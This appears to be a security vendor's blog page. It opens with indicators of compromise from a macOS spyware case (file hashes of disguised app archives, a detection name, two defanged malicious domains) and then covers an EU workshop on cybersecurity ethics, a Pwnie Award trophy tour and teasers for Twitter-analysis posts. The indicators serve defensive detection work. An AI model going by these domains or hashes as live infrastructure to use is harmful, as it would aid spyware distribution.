  • 3095c0450871f4e1d14f6b1ccaa9ce7c2eaf79d5 – Exodus-MacOS-1.64.1-update.zip
  • 04b9bae4cc2dbaedc9c73c8c93c5fafdc98983aa – picupdater.app.zip
  • c22e5bdcb5bf018c544325beaa7d312190be1030 – taxviewer.app.zip
  • d3150c6564cb134f362b48cee607a5d32a73da66 – launchpad.app.zip
  • bf54f81d7406a7cfe080b42b06b0a6892fcd2f37 – macbook.app.zip


  • Monitor:OSX/Realtimespy.b6f5a15d18!Online


  • realtime-spy-mac[.]com
  • update-exodus[.]io


Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing amount of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, a workshop was organized by F-Secure at our HQ on ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say, what are the considerations that cybersecurity companies and related organizations must take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy focused organizations. The Chatham House rule (in particular, no recording policy) was used to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in text of this post. But, for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.


Taking Pwnie Out On The Town

Black Hat 2018 is now over, and the winners of the Pwnie Awards have been published. The Best Client-Side Bug was awarded to Georgi Geshev and Rob Miller for their work called “The 12 Logic Bug Gifts of Christmas.”

Pwnies2018 The Pwnie Awards

Georgi and Rob work for MWR Infosecurity, which (as some of you might remember) was acquired by F-Secure earlier this year. Both MWR and F-Secure have a long history of geek culture. One thing we’ve done for years, is to take our trophies (or “Poikas”) for a trip around the town. For an example, see this.

So, while the Pwnie is still here in Helsinki before going home to UK, we took it around the town!

Pwnie2018 HQ

Pwnie at the F-Secure HQ.

Pwnie2018 Kanava

Pwnie at Ruoholahdenkanava.

Pwnie2018 Harbour

Pwnie at the West Harbour.

Pwnie2018 Baana

Pwnie looks at the Baana.

Pwnie2018 Museum

Pwnie and some Atari 2600s and laptops at the Helsinki computer museum.

Pwnie2018 MIG

Pwnie looking at a Mikoyan-Gurevich MiG-21 supersonic interceptor.

Pwnie2018 Tennispalatsi

Pwnie at the Art Museum.

Pwnie2018 awards

Pwnie chilling on our award shelf.

Pwnie2018 Parliament

Pwnie at the house of parliament.


Pwnie at the Tuomikirkko Cathedral.

Thanks for all the bugs, MWR!


P.S. If you’re wondering about the word “Poika” we use for trophies, here’s a short documentary video that explains it in great detail.


How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details. And many of the subsequent (non-technical) articles that have been published has focused almost exclusively on […]


Video: Creating Graph Visualizations With Gephi

I wanted to create a how-to blog post about creating gephi visualizations, but I realized it’d probably need to include, like, a thousand embedded screenshots. So I made a video instead.


Pr0nbots2: Revenge Of The Pr0nbots

A month and a half ago I posted an article in which I uncovered a series of Twitter accounts advertising adult dating (read: scam) websites. If you haven’t read it yet, I recommend taking a look at it before reading this article, since I’ll refer back to it occasionally. To start with, let’s recap. In my […]


Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an […]


How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same […]


Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project. “The Scalable and Secure […]


Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, […]


NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely: “Word2vec takes as its input a large corpus of text and produces a vector space, typically of several […]


NLP Analysis And Visualizations Of #presidentinvaalit2018

During the lead-up to the January 2018 Finnish presidential elections, I collected a dataset consisting of raw Tweets gathered from search words related to the election. I then performed a series of natural language processing experiments on this raw data. The methodology, including all the code used, can be found in an accompanying blog post. […]


How To Get Tweets From A Twitter Account Using Python And Tweepy

In this blog post, I’ll explain how to obtain data from a specified Twitter account using tweepy and Python. Let’s jump straight into the code! As usual, we’ll start off by importing dependencies. I’ll use the datetime and Counter modules later on to do some simple analysis tasks. from tweepy import OAuthHandler from tweepy import […]